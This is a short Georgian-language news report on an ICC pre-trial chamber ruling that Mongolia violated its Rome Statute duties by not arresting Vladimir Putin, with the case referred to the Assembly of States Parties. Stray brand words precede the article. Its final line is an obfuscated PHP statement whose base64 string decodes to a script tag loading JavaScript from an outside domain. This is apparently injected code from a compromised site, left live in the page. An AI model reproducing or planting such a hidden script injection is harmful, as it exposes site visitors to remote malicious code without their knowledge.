celsiusi
ავერსი შნაიდერი

სისხლის სამართლის საერთაშორისო სასამართლოს II წინასასამართლო პალატამ დაადასტურა, რომ მონღოლეთმა დაარღვია თავისი, როგორც რომის სტატუტის მონაწილე სახელმწიფოს ვალდებულებები იმის გამო, რომ სასამართლოს ორდერის შესაბამისად, რუსეთის პრეზიდენტი, ვლადიმერ პუტინი არ დააპატიმრა, - ამის შესახებ პალატის გადაწყვეტილებაშია აღნიშნული.

დოკუმენტის თანახმად, პუტინის დაპატიმრებაზე უარის თქმის გამო, მონღოლეთმა ხელი შეუშალა სისხლის სამართლის საერთაშორისო სასამართლოს თავისი ფუნქციებისა და უფლებამოსილების განხორციელებაში და სახელმწიფოს მეთაურის იმუნიტეტი არ იძლევა დაპატიმრების ორდერის უგულებელყოფის საფუძველს.

„მონღოლეთის სასამართლოსთან თანამშრომლობაზე უარის სერიოზულობის გათვალისწინებით, პალატამ საჭიროდ ჩათვალა საკითხის მონაწილე სახელმწიფოთა ასამბლეისთვის გადაცემა“, - აღნიშნულია სასამართლოს გადაწყვეტილებაში.

შეგახსენებთ, პუტინის მონღოლეთში 3 სექტემბერს ჩავიდა და ეს იყო მისი პირველი ვიზიტი სისხლის სამართლის საერთაშორისო სასამართლოს რომის სტატუტის მონაწილე სახელმწიფოში მას შემდეგ, რაც სასამართლომ 2023 წლის მარტში, უკრაინელი ბავშვების გატაცებაში მონაწილეობის გამო, მისი დაპატიმრების ორდერი გამოსცა.

67
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");